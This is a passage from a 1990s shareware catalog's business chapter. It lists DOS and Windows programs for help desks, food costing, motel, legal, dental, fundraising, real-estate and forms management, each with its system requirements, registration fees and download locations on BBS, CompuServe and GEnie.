HOTNET.ZIP on GEnie in IBMPC forum LIBrary 0 (or + contact userID JEROBICHAUX for assistance). + Download size: 420k (about 31 minutes with a 2400 baud modem) + Description: + Whether you call it a help desk, a customer support center, a + or a trouble desk, telephone technical support can be a beast! + This helps by logging problem calls and solutions and easily. + Track calls, recycle solutions with powerful searches. Use + "crib Sheets" and access common information with a hotkey. + Comes in single and multiuser, can run TSR. Describe problems + in the caller's own words with a free-form comments field. + + + Product: ProAct Contact Management + Home/business contact manager. See full description on + page 326. + + Product: RPMSHARE + RPM/resources and projects manager. See full description on + page 300. + + Product: Service Call Manager + Manage service calls & information. See full description on + page 301. + + Product: Shareware Tracker + Data tracking program for shareware authors. See full + description on page 641. + + Product: Timeclock I + Employee timeclock with reports. See full description on + page 299. + + + 7.8 Organization charts + + See also: Graphics, Drawing/editor programs. + + Chapter 7, "Business" 308 + + + + Product: EDGEFLOW + Flowcharting and diagramming tool for DOS. See full + description on page 487. + + Product: Top Draw + Powerful object-oriented drawing program. See full description + on page 491. + + Product: TreeChart + Author: , (+353)-91-37560 + Version: 2.00 (08-23-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Strongly recommended: Mouse. TrueType or ATM fonts. + Registration fee: $42.00 (add $13.86 for shipping to U.S. + addresses) (add $13.86 for shipping to Canadian addresses) (add + $13.86 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; lifetime return policy; bonus utilities; all ASP-wide + offers (see page 5). 6-month free upgrading allowed. + Look for: TCF200.ZIP on BBSs; TCF200.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 11 (or contact userID 70624,462 for + assistance). + SWREG#: 1927 + PsL#: 11053 + Download size: 550k (about 41 minutes with a 2400 baud modem) + Description: + A package for organization charts or illustrating other + hierarchical information. No drawing skills required: box + sizing, positioning and line routing all done automatically. + Numerous chart styles/box shapes. Layouts (style guides) for + consistent appearance. Print preview, fit-to-page, + titles+border. Outlining: view/print chart, management or + single departments. Supports assistants and shared employees. + Imports text, exports text & fully scaleable WMF pictures. + + + 7.9 Specific-field systems + + 7.9.1 Construction, installation & repair + + Product: J-Works + Author: , 615-896-3966 + Version: 2.2 (03-01-95) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor. + Strongly recommended: VGA monitor; Hard disk; HP LaserJet + printer; Mouse; Epson printer. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 3 months of unlimited phone, fax, + mail support; 1-month return policy; all ASP-wide offers (see + + Chapter 7, "Business" 309 + + + + page 5); discounts on other products; discounts on upgrades. + 12-month free upgrading allowed. 1 free update disk(s) sent + out. Printed manual, 90 day free technical support. + Look for: JWORKS22.ZIP on BBSs. + Download size: 306k (about 23 minutes with a 2400 baud modem) + Description: + Automates the process of calculating the load for a house to + determine the correct size heating and cooling system required. + It requires that you use ACCA's Manual J booklet to insert the + correct HTM's for your particular region. You then insert the + building dimensions for your house and it does the rest. + Supports "Room-by-Room" and "Whole-house" load calcul ations. + Mouse support. Includes a CFM calculator, auto print capability + for presentation to customers. + + + 7.9.2 Farming & ranching + + Product: Grow'Em + Grow from seed/cuttings. Easy, slick, great p. See full + description on page 538. + + Product: HortMan + Horticultural manager. See full description on page 538. + + 7.9.3 Food services + + Product: INVENTORY & COST CONTROL + Author: , 208-376-4411 + Version: 4.2 (01-15-94) + Needs: IBM PC, DOS 3.2 or better. 300k RAM; Hard disk. + Strongly recommended: VGA monitor; HP DeskJet printer. + Registration fee: $150.00 (add $3.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3-month return policy; bonus utilities. + 12-month free upgrading allowed. + Look for: INVCTL42.ZIP on BBSs; INVCTL.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 15 (or contact userID 71242,1414 for + assistance). + Download size: 316k (about 24 minutes with a 2400 baud modem) + Description: + Designed for multi unit food service with central purchasing. + Record central or direct unit receiving or issue to and from + units. Maintains Perpetual inventory of central storage. + Inventory tools such as location coding almost make the job of + controlling inventory enjoyable! Purchasing history by product + and by vendor. Shortage reports based on par levels. Receiving + reports by day, week or whatever. P&L reports by profit center + - excellent tool for analysis and budgeting. Basis for recipe + cost. + + Chapter 7, "Business" 310 + + + + Product: Managing Your Food + Author: , 805-398-1449 + Version: 4.51 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Hard disk. + Strongly recommended: Mouse. + Registration fee: 35.00US (add 5.00US for shipping to Canadian + addresses) (add 5.00US for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, mail support; bonus + utilities; all ASP-wide offers (see page 5). 12-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: MYF*.ZIP on BBSs (call 805-682-6158 to download it at + no charge). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + A complete food manager designed for food manufacturers, + institutional food planners and cooks, restaurant managers, + dietitians, diabetics, bakers, and the home shopper. Its use is + easy enough for the novice, yet comprhensive enough for the + professional. Will track cost, protein, carbohydrates, fat, + calories, cholesterol, fatty acids, fiber, vitamins, minerals, + food exchanges, and %RDA. Outputs hundreds of reports including + NLEA label information. + + + Product: PC-FOOD II FOOD COSTING + Author: , 612-731-6822 + Version: 7.02 (06-03-95) + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM; Hard disk. + Strongly recommended: CGA monitor. + Registration fee: $57.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 12 months of phone, CompuServe, + mail support; discounts on upgrades. + Look for: PCFD702.ZIP on BBSs; PCFOOD.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 15 (or contact userID 76467,2213 for + assistance). + Download size: 186k (about 14 minutes with a 2400 baud modem) + Description: + Calculates and maintains food cost and required selling prices. + Edit portion sizes, expected waste, ingredient costs, serving + sizes, etc. and see the effect on costs and margins. Print + reports including required price changes based on user variance + criteria. Calc total revenue, food cost and gross profit for a + banquet, etc. User selectable sorted displays. Up to 30 + ingredients in a recipe. Up to 30 ingredients and or recipes + in a menu item. Full mouse support. + + Chapter 7, "Business" 311 + + + + Product: RECIPE FILE MANAGEMENT + Author: , 208-376-4411 + Version: 3.3 (02-01-94) + Needs: IBM PC, DOS 3.2 or better. 250k RAM; Hard disk. + Strongly recommended: VGA monitor; HP DeskJet printer. + Registration fee: $95.00 (add $3.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3-month return policy; bonus utilities. + 12-month free upgrading allowed. + Look for: RECMGT33.ZIP on BBSs; RECMGT.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 15 (or contact userID 71242,1414 for + assistance). + Download size: 219k (about 17 minutes with a 2400 baud modem) + Description: + A kitchen production tool: + 1. Maintain file for fast access to edit or print recipe. + 2. Adjust recipe yields in a flash. + 3. Resource for many food product weight & measure + equivalent. + A management tool: + 1. Update cost of one or all recipes in file. + 2. Generate shopping/pull list of selected recipes. + 3. Access inventory software for current cost data. + Can run as a stand alone or interface with inventory software. + + + Product: RESTAURANT COST CONTROL + Author: , 208-376-4411 + Version: 4.2 (01-15-94) + Needs: IBM PC, DOS 3.2 or better. 300k RAM; CGA monitor; Hard + disk. + Registration fee: $95.00 (add $3.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3-month return policy; bonus utilities. + 12-month free upgrading allowed. + Look for: RSTCTL42.ZIP on BBSs; RSTCTL.ZIP on CompuServe in + CIS:IBM forum LIBrary 15 (or contact userID 71242,1414 for + assistance). + Download size: 315k (about 24 minutes with a 2400 baud modem) + Description: + Offers management a state of the art tool to sharpen purchasing + practices, tighten inventory levels and provide cost analysis + for budgeting. Physical inventory functions provide a wide + varity of forms, reports and calculations that make the job of + controlling inventory easier and faster. Profit & Loss analysis + will save you $$$$$. Paying vendors is fast and flexible; cash, + manual check or printed check. Provides cost data base for our + Recipe File Management software. + + Chapter 7, "Business" 312 + + + + 7.9.4 Hotel/motel management + + Product: Book-It + Membership and activity booking system. See full description + on page 318. + + Product: MotelMAX + Author: , 504-885-7470 + Version: 2.10 (05-01-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Hard disk. + Strongly recommended: EGA monitor. + Registration fee: $135.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $11.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of CompuServe, mail support; all ASP- + wide offers (see page 5). + Look for: MOTEL210.ZIP on BBSs; MTLMAX.ZIP on CompuServe in + CIS:IBMAPPS forum LIBrary 15 (or contact userID 72704,3566 for + assistance). + PsL#: 10928 + Download size: 365k (about 27 minutes with a 2400 baud modem) + Description: + Includes reservations, advance deposits, front desk, + accounting, general ledger, travel agent commissions, guest + history, room inventory, folio reprints and many, many reports. + One key check-in/check-out. Supports international date and + currency formats. Automatically assigns room rates for up to + 10 room types. Password protected. + + + 7.9.5 Legal & law enforcement + + Product: CHRONOS + Interactive historical timelines. See full description on + page 473. + + Chapter 7, "Business" 313 + + + + Product: The Lawyer's DeskTop + Author: , 713-978-7431 + Version: 2.1 (07-25-94) + Needs: IBM AT (80286), DOS 3.3 or better. 430k RAM; CGA monitor; + Hard disk; HP LaserJet printer; Epson printer. + Strongly recommended: EGA monitor. + Registration fee: $79.95 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, CompuServe, newsletter, mail support; 2-month return + policy; bonus utilities. + Look for: availability unknown on BBSs; LDT.ZIP on CompuServe in + CIS:LAWSIG forum LIBrary 5. + SWREG#: 1578 + Download size: 533k (about 40 minutes with a 2400 baud modem) + Description: + A legal management work group application that provides an + integrated approach to law office management for the small to + medium size law firm and solo practicioners. It contains case/ + matter management, document management, time and billing, + calendaring (to dos and appointments), docket control, case + critical date tickling, contact managment, payables, a full + text search engine, utilities and much more. + + + Product: SMALL BUSINESS ADVISOR + Expert tax/legal help for small businesses. See full + description on page 321. + + 7.9.6 Library + + See also: Education, Library/bibliography. + + Product: BIBLOGIC + Bibliographic reference database manager. See full description + on page 207. + + Product: PUBLIC ACCESS(tm) + Front-end control for public PC access. See full description + on page 294. + + Product: REFILE + Document management software. See full description on + page 461. + + Product: RMS-III: Ref.Mgn.Sys. + Menu based biblio/reference system. See full description on + page 207. + + Chapter 7, "Business" 314 + + + + 7.9.7 Medical & dental + + Product: LEANER + Weight control charting & motivation program. See full + description on page 546. + + Product: Tolman Dental Program + Author: , 516-281-5544 + Version: 5.0 (04-01-94) + Needs: IBM PC, DOS 2.0 or better. Hard disk. + Registration fee: $599.00 + Registration benefits: Printed manual, bonus data files, six + months phone support. + Look for: TOLMAN#.ZIP on BBSs (multiple files) (call ALL-ASP-BBS + to download it at no charge); TOLMN*.ZIP on CompuServe in + CIS:DBADVISOR forum LIBrary 8 (multiple files) (or contact + userID 72617,70 for assistance); TOLMAN#.ZIP on GEnie in + DATABASE forum LIBrary 4 (multiple files) (or contact userID + XMG16757 for assistance). + Download size: 480k (about 36 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A CompuServe Magazine (Dec '91) pick as a "Current Hit," is an + efficient management program for a mid-size dental office. With + electronic claims, it is not incomplete. It will handle + billing, recalls, insurance, referral tracking, a variety of + patient lists, production reports, mail merge and more. With + online help, look-up windows and a User's Manual, the program + is easy to learn. It was used/improved in the dentist/author's + office for 4 years before release. + + + 7.9.8 Non-profit businesses + + 7.9.8.1 Fund raising + + Product: FundRaiser Basic + Author: , 417-256-4280 + Version: 1.32 (03-08-95) + Needs: IBM PC, DOS 3.1 or better. 510k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $48.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, CompuServe, mail support; 2-month return + policy; site license; all ASP-wide offers (see page 5); + discounts on other products; discounts on upgrades. 1 free + + Chapter 7, "Business" 315 + + + + update disk(s) sent out. Booklet on successful fundraising + tips & techniques. + Look for: FRB132.ZIP on BBSs; FRB132.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 15 (or contact userID 72077,1015 for + assistance). + SWREG#: 4530 + Download size: 457k (about 34 minutes with a 2400 baud modem) + Description: + Very easy to learn and use. Here are the tools you need to + fundraise like a real professional. In one typical session, + you can: record donations, make address changes, code donors, + print timely thank you letters and labels, print a deposit + report - all without leaving the program! Targeted mailings + are a snap, as are the impressive and useful reports. Now, + import you existing mailing list easily and quickly. + + + 7.9.9 Political parties + + Product: THE CALLING TREE + Author: , 303-671-0800 + Version: 1.7a (08-31-94) + Needs: IBM PC, DOS 2.11 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Hercules monitor; Hayes-compatible modem; Epson printer. + Strongly recommended: VGA monitor. + Registration fee: $29.00 (add $5.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: ZTREE17.ZIP on BBSs (call 303-665-6091 to download it + at no charge); ZTREE.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 1 (or contact userID 70505,531 for assistance); + ZTREE14.EXE on GEnie in IBMPC forum LIBrary 3 (or contact + userID XTY25572 for assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + Mananage tree like organization data. Instances where one + person is related to several others and they each in turn are + related to several other and so one until the outer limits of + the tree are reached. Sort of like a contact manager for + political party information matrixes, network marketing MLM + companies, and emergency contact systems where I may call 5 + people and they each in turn will call 5 people and so on until + all members of the tree have have the word. + + Chapter 7, "Business" 316 + + + + 7.9.10 Real estate + + Product: CRISP-R REAL ESTATE ACCOUNTING + Author: , 415-974-6201 + Version: 2.10 (07-01-95) + Needs: IBM PC, DOS 2.1 or better. 640k RAM; Hard disk. + Registration fee: $55.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, mail support. + 12-month free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + A bookkeeping system for up to 100 or more different properties + using just one bank account (or up to three bank accounts) for + all properties in one data base. Allows up to five data bases + of different groups of properties. There are 250 user named + accounts and 250 payor/payees, with unlimited special payor/ + payees. Reports are for any one property, all properties, or a + group of properties. Fast and easy to use. + + + Product: Financial Analysis For Windows + Analyze large variety of financial instrument. See full + description on page 342. + + Product: Home Plan + Draw, print, edit & save house plans. See full description on + page 500. + + Product: Home Refinancing + Compute time value savings from refinancing. See full + description on page 343. + + Product: MapDraw + Deed plotter, map drawing (metes and bound. See full + description on page 362. + + Chapter 7, "Business" 317 + + + + Product: OpenHome + Author: + Version: 3.10 (07-16-95) + Needs: IBM AT (80286), Windows 3.1 or better. 1024k RAM; Hard + disk; HP LaserJet printer. + Strongly recommended: Mouse. + Registration fee: $47.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; OPNHME.ZIP on CompuServe + in CIS:INVESTORS forum LIBrary 6 (or contact userID 72614,43 + for assistance). + Download size: 297k (about 22 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A selling property qualification generator for Windows 3.1. You + supply the selling property information and current rates for + fixed-, adjustable- and FHA-loans, and OpenHome generates an + attractive, easy-to-understand sheet which shows "cash to + close", "monthly payment" and "minimum monthly income" for up + to three different down payments of your choice. Can use any of + your Windows TrueType fonts and can even print the + qualification sheet in color, if you have a color printer. + + + Product: Property Master + Author: , 703-777-5660 + Version: 4.01 (05-20-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor; + Hercules monitor; Hard disk; HP DeskJet printer; HP LaserJet + printer; Mouse; Epson printer. Will not work with any version + of DOS 4.0. + Registration fee: $25.00 (add $5.00 for shipping to Canadian + addresses) (add $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; all ASP-wide + offers (see page 5); registration commissions. + Look for: PMAST41.ZIP on BBSs. + Download size: 498k (about 37 minutes with a 2400 baud modem) + Description: + A rental property database and rental management system for + landlords or property managers. Keep track of single family, + multiple family (apartments) or businesses. Associate landlords + to properties; properties to other properties. Track income and + expenses by property (rent, repairs) & general expenses + (mileage, postage). Tax reports for Schedule E & 1099 expenses. + Keep track of deposits, refunds & leases. + + Chapter 7, "Business" 318 + + + + 7.9.11 Safety & fire protection + + Product: SCBA Trak + Author: , 216-225-0248 + Version: 2.40 (01-28-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor; Hard + disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Mouse; Network (LAN). + Registration fee: $35.00 (add $10.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited phone, fax, CompuServe, mail support. + Lifetime free upgrading allowed. + Look for: SCBATR24.ZIP on BBSs (call 719.591.7415 to download it + at no charge); SCBATR.ZIP on CompuServe in CIS:SAFETYNET forum + LIBrary 13 (or contact userID 72270,650 for assistance). + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + Inventory & maintenance record system for Self-Contained + Breathing Apparatus and PASS units. Keeps track of repetitive + maintenance needs & costs for masks, back packs, bottles, & + PASS units. Gives early warning of packs coming due for flow + test, regulator overhaul, mask fit tests, etc. Warns of PASS + units coming due for battery change. Early warning of bottles + coming due for hydro testing or composite end of life. Many + reports, incl. budget projections, equipment lists, activity + reports, etc. + + + 7.9.12 Small businesses + + Product: Book-It + Author: , +44(0)161-861-0043 + Version: 1.0a (04-25-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + Mouse. + Registration fee: $95.00 (add $7.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited fax, CompuServe, mail support; + lifetime return policy; all ASP-wide offers (see page 5); + discounts on upgrades; registration commissions. + Look for: availability unknown on BBSs; BOOKIT.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 16 (or contact userID 100103,3722 + for assistance). + SWREG#: 5422 + Download size: 1570k (about 117 minutes with a 2400 baud modem) + Description: + Windows membership and activity / event booking system for + small hobby type clubs and organisations as well as larger + businesses such as activity clubs and holiday companies. + Facilities include - club / organisation enquiry and follow up, + + Chapter 7, "Business" 319 + + + + membership administration, event or activity booking and + administration, credit note administration, activity supplier + and venue details, mail merge and label printing facilities, + flexible reporting facilities, contect sensitive help system. + + + Product: Electronic Postal Window(tm) + US postal rates look-up program. See full description on + page 333. + + Product: Flexitime/Time Logging + Integrated time logging, recording, billing. See full + description on page 297. + + Product: Folders + Personal information manager network email. See full + description on page 142. + + Product: GARDENING BUSINESS + Author: , 310-832-6984 + Version: 1.1 (03-25-95) + Needs: IBM 80386, Windows 3.1 or better. 8000k RAM; SVGA + monitor; Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: XMS memory; math coprocessor. + Registration fee: $125.00 (add $5.50 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs. + Download size: 2100k (about 156 minutes with a 2400 baud modem) + Description: + A business management software for small companies. It keeps + track of customers and their orders, prices, supplier + information, material & labor requirements, buy history and + cashflow. It automatically creates work orders, prints + invoices and reports. Designed for those small businesses + where practically no inventory is necessary. Can be used for + any small businesses with similar requirements. + + + Product: HOME/OFFICE INVENTORY + Organize personal and business property data. See full + description on page 327. + + Product: LEADING AND MANAGING OTHERS + A multimedia seminar on disk: leaders & mgrs. See full + description on page 329. + + Product: ListBuilder + Contact manager for building a Network. See full description + on page 143. + + Chapter 7, "Business" 320 + + + + Product: PC-AP + Accounts payable. See full description on page 271. + + Product: PC-AR + Accounts receivable. See full description on page 281. + + Product: PC-GL + General ledger. See full description on page 272. + + Product: PC-PR + Payroll writing. See full description on page 285. + + Product: PCINV + Invoice writing. See full description on page 272. + + Product: PostCardMaster + Postcard & mail handling system. See full description on + page 242. + + Product: ProAct Contact Management + Home/business contact manager. See full description on + page 326. + + Product: Rosewood Journal + Invoice journal and accounts receivable. See full description + on page 273. + + Product: Sales & Samples + Author: , 704-568-9598 + Version: 1.0 (04-01-94) + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Strongly recommended: CGA monitor; Hercules monitor; Hard disk; + HP DeskJet printer; HP LaserJet printer; Epson printer; EMS + memory; XMS memory. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 12 months of unlimited fax, BBS, + CompuServe, mail support; 1-month return policy; all ASP-wide + offers (see page 5); registration commissions. 12-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: CTJISS.* on BBSs (multiple files) (call 704-532-1236 to + download it at no charge); CTJISS.* on CompuServe in CIS:WORK + forum LIBrary 9 (multiple files) (or contact userID 72760,1020 + for assistance). + SWREG#: 3481 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + A relational database application expressly developed to allow + the user to easily enter sales orders generated from a home + sales business selling cosmetics. It consists of two databases, + one for the customer specific information such as address, + phone etc., the other for the orders, samples and invoices that + automatically calculates totals including State sales tax if + + Chapter 7, "Business" 321 + + + + applicable. The reports generated include totals for a + customer, totals by day, and group totals. Form is similar to + paper form. + + + Product: SMALL BUSINESS ADVISOR + Author: , 206-391-4036 + Version: 94.4 (10-15-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. Does not + run on IBM PCjr. + Registration fee: $29.95 (add $5.00 for shipping to Canadian + addresses) (add $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; quick- + reference card; choice of 31/2" or 51/4" master disk(s); 3 months + of unlimited phone, mail support; bonus utilities; discounts on + upgrades. 1 free update disk(s) sent out. + Look for: SBA94_4.ZIP on BBSs (call 703-680-9269 to download it + at no charge). + PsL#: 11079 + Download size: 712k (about 53 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Unique expert program puts the tax/legal/business knowledge of + a Harvard lawyer, "Big 6" CPA at your disposal instantly. Very + easy to use! Gives your small business quick, current tax & + legal advice based on your state law on all fed/state taxes, + OSHA, ADA, envir. laws & more. Creates detailed customized + startup checklist for your business, your state in seconds. + Wide range of Q&A "consulting sessions" such as whether to + incorp. or elect Sub S. EZ-to-use income/estate/corp tax + modules. + + + Product: Time Keeper [***] + D.base to record and report empl. attendance. See full + description on page 298. + + Product: Vehicle Costs + Reports on costs involved with vehicle use. See full + description on page 293. + + 7.9.13 Other + + Product: Book-It + Membership and activity booking system. See full description + on page 318. + + Product: GARDENING BUSINESS + Software for managing small gardening bus. See full + description on page 319. + + Chapter 7, "Business" 322 + + + + Product: League Manager + Manages any youth sports organization. See full description on + page 575. + + Product: OMS (Organizational Mgmt System + Author: , 804-488-5506 + Version: 2.3 (11-01-93) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Hard disk; Network + (LAN). + Registration fee: $359.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of tollfree 800# phone, fax, BBS, + CompuServe, mail support; royalty-free runtime license; site + license; discounts on other products; discounts on upgrades. + Look for: OMS23A.ZIP on BBSs (multiple files) (call 804-488-4146 + to download it at no charge); OMS23A.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 10 (multiple files) (or contact userID + 73747,2336 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Total solution for nonprofit organizations. Modules for + "members\prospects\other donors", "dues and dontributions", + "fund accounting" and much more. Great for any organization + that has a membership, collects dues or accepts contributions, + does fund raising, or uses fund accounting. Has powerful + maillist management. Great for clubs, religious groups, + political fund raising groups, college alumni associations, + homeowners associations, museums, performing arts groups, many + others. + + + Product: Paper Route Ledger + Computer bookkeeping for newspaper carriers. See full + description on page 270. + + Product: Time Keeper [***] + D.base to record and report empl. attendance. See full + description on page 298. + + + 7.10 Forms generators + + Product: DR. FORM + Author: , 412-931-9577 + Version: 3.1 (03-01-94) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; CGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $39.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 12 months of + phone, fax, CompuServe, mail support; 1-month return policy; + + Chapter 7, "Business" 323 + + + + bonus data; discounts on upgrades. 3-month free upgrading + allowed. + Look for: DRFORM31.ZIP on BBSs (call 508-368-7139 to download it + at no charge); DRFORM.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 6 (or contact userID 71045,222 for assistance). + SWREG#: 1250 + PsL#: 10925 + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Shareware Magazine Editor's Choice Award. Make professional + quality forms easily. Full mouse support. Move, copy, draw + lines, etc. Automatic grid maker. Create master forms and fill + them in. Print on pre-printed forms and make templates. Context + sensitive help screens. Print bold, italic, etc. Supports dot + matrix & laser printers. Can print legal size forms (14") and + can print landscape on laser printers. Much more.... + + + Product: The Letterhead Kit/DOS + Retrieves custom letterheads, graphics, bills. See full + description on page 225. + + Product: The Letterhead Kit/Win + Retrieves custom letterheads, graphics, bills. See full + description on page 225. + + Product: Resume Master Deluxe + Easy-to-use but powerful resume creator. See full description + on page 208. + + Product: The Right Resume + Windows resume creator & job search package. See full + description on page 208. + + Product: WebForms + WWW forms generator! See full description on page 374. + + Chapter 7, "Business" 324 + + + + 7.10.1 Forms fillers + + Product: Form Editor (FED) + Author: , 216-659-9489 + Version: 1.13 (05-05-95) + Needs: IBM PC, DOS 1.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: US$15.00 (add US$2.00 for shipping to U.S. + addresses) (add US$3.00 for shipping to Canadian addresses) + (add US$5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + bonus utilities; all ASP-wide offers (see page 5); disks of + other shareware; discounts on other products. + Look for: FED113.ZIP on BBSs (call 216-661-9065 to download it at + no charge); FED113.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 0 (or contact userID 73057,3113 for assistance); FED113.ZIP on + GEnie in IBMPC forum LIBrary 0. + Download size: 128k (about ten minutes with a 2400 baud modem) + Description: + Uses standard ASCII test files as forms. Sees underlines as + input fields. Prints forms to any printer. Saves forms or forms + and data. Can save data only for import to databases. + + + 7.10.2 Forms processing + + Product: Form Editor (FED) + Form Editor/Filler for standard text files. See full + description on page 324. + + Product: Over_LAZ PS + PostScript overlays and letterheads. See full description on + page 93. + + Product: XPENS + Expense account reporting program. See full description on + page 273. + + + 7.11 Sales aids + + Product: THE CALLING TREE + Calling tree database manager. See full description on + page 315. + + Chapter 7, "Business" 325 + + + + Product: CATALOG-ON-A-DISK + Author: , 607-533-4685 + Version: 4.00 (05-01-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Hard disk; Mouse. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Epson printer. + Registration fee: $55.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 6 months of unlimited phone, BBS, CompuServe, + newsletter, mail support; 1-month return policy; bonus + utilities; all ASP-wide offers (see page 5); discounts on + upgrades. + Look for: CATALG40.ZIP on BBSs (call 607-533-7072 to download it + at no charge); CATALG.ZIP on CompuServe in CIS:IDEAS forum + LIBrary 9 (or contact userID 71333,1577 for assistance); + CATALG40.ZIP on GEnie in HOSB forum LIBrary 12 (or contact + userID D.VEANER1 for assistance). + Download size: 357k (about 27 minutes with a 2400 baud modem) + Description: + Customers browse or search for products, order as they go + along, and print the order form with shipping and tax pre- + calculated to be sent by mail, fax, modem, or phone. The + compressed catalog fits a large number of products on disk and + provides security for prices and other data. You make the + catalog to best reflect your company. Flexible, easy to order + from, innovative. Submenus, size and color boxes, mix and + match products, info and coupons, many features. + + + Product: Computerized Christmas Cards [***] + 3 animated musical Xmas cards: duplicate send. See full + description on page 584. + + Product: DAYO 